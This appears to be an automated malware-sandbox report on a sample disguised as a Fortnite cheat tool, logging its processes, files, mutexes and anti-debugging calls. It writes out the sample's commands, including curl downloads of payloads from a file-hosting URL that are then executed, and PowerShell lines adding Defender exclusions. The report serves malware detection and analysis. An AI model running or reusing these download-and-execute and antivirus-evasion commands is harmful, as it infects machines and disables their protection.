Code function: 0_2_00007FF68B4B4BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,

0_2_00007FF68B4B4BD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_004345E0 CoCreateInstance,

11_2_004345E0

Source: C:\Windows\Speech\kdmapper.exe

Code function: 5_2_0016A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

5_2_0016A6C2

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: c:\Program Files (x86)\Microsoft\Edge\Application\CSCF5F43EE1A3D5479687C855494E4EF77.TMP

Source: C:\Windows\Speech\physmeme.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\physmeme.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3380:120:WilError_03
Source: C:\Edge\msedge.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4200:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1148:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2976:120:WilError_03
Source: C:\Edge\msedge.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\JFIOSDHSUDFHUSIDGHHDJCXZCHBKLJZGVHSKDFGOIUYDSGYOIYD
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4472:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3772:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4864:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4940:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1508:120:WilError_03

Source: C:\Edge\msedge.exe

File created: C:\Users\user\AppData\Local\Temp\srvpqulv

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "

Source: C:\Windows\Speech\kdmapper.exe	Command line argument: sfxname	5_2_0016DF1E
Source: C:\Windows\Speech\kdmapper.exe	Command line argument: sfxstime	5_2_0016DF1E
Source: C:\Windows\Speech\kdmapper.exe	Command line argument: STARTDLG	5_2_0016DF1E

Source: 4tXm5yPtiy.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 4tXm5yPtiy.exe

ReversingLabs: Detection: 57%

Source: 4tXm5yPtiy.exe	String found in binary or memory: Save/Load
Source: 4tXm5yPtiy.exe	String found in binary or memory: Save/Load
Source: 4tXm5yPtiy.exe	String found in binary or memory: CombatVisualsWeaponConfigMisc##MainAimbotPredictionTriggerbotTriggerbot Delay (ms)Triggerbot Distance (m)Fov CircleFilled FovFov SizeSmoothingHitboxCorner 2D 3D NothingRankDraw FilledUsernameSnaplineSkeletonFov ArrowsDistanceRender CountWeapon configShotgun SettingsShotgun SmoothShotgun FovSMG SettingsPrediction SMG SmoothSMG FovRifle SettingsPrediction Rifle SmoothRifle FovSniper SettingsPrediction Sniper SmoothSniper Fov(AIR STUCK)RISKY FEATURE:Air StuckUnload##Main1Save/LoadSave Configconfig.jsonLoad Config##MainsLegit ConfigSemi ConfigRage ConfigReaper Sniper RifleBolt-Action Sniper RifleHeavy Sniper RifleStorm Scout Sniper RifleHunting RiflePump ShotgunTactical ShotgunCharge ShotgunSuppressed SMGCompact SMGRapid Fire SMGAssault RifleBurst Assault RifleTactical Assault RifleThermal Scoped Assault RifleScoped Assault RiflePumpShotgunTacticalShotgunChargeShotgunLeverActionShotgunDragonBreathShotgunDoubleBarrelShotgunAutoShotgunSingleShotgunCombatShotgunSlugShotgunVisible Entities: Nearby Entities: HandsBronze 1Bronze 2Bronze 3Silver 1Silver 2Silver 3Gold 1Gold 2Gold 3Platinum 1Platinum 2Platinum 3Diamond 1Diamond 2Diamond 3EliteChampionUnrealUnrankedm] Load Dependencies (Close Game First) Inject Orqur Your choice: cls Driver FoundDriver Error Contact Support. Waiting For FortniteFortniteClient-Win64-Shipping.exeThe driver could not get the base address...Base Address -> VAText -> cr3 -> vector too longd}a

Source: unknown	Process created: C:\Users\user\Desktop\4tXm5yPtiy.exe "C:\Users\user\Desktop\4tXm5yPtiy.exe"
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Process created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe"
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
Source: C:\Windows\Speech\kdmapper.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Process created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe"
Source: C:\Windows\Speech\physmeme.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Speech\physmeme.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3594.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCF5F43EE1A3D5479687C855494E4EF77.TMP"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37B7.tmp" "c:\Windows\System32\CSC97DCA7013344A2AA8495395955A7A7.TMP"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe'
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zugvBzMsRZ.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: unknown	Process created: C:\Edge\msedge.exe C:\Edge\msedge.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown	Process created: C:\Edge\msedge.exe C:\Edge\msedge.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qFKlxXtZuP.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
Source: unknown	Process created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5CZTOTC2vN.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown	Process created: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4evtisdSvL.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Process created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe"	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Process created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.cmdline"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe'	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zugvBzMsRZ.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3594.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCF5F43EE1A3D5479687C855494E4EF77.TMP"
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qFKlxXtZuP.bat"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37B7.tmp" "c:\Windows\System32\CSC97DCA7013344A2AA8495395955A7A7.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4evtisdSvL.bat"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5CZTOTC2vN.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: sspicli.dll	Jump to behavior
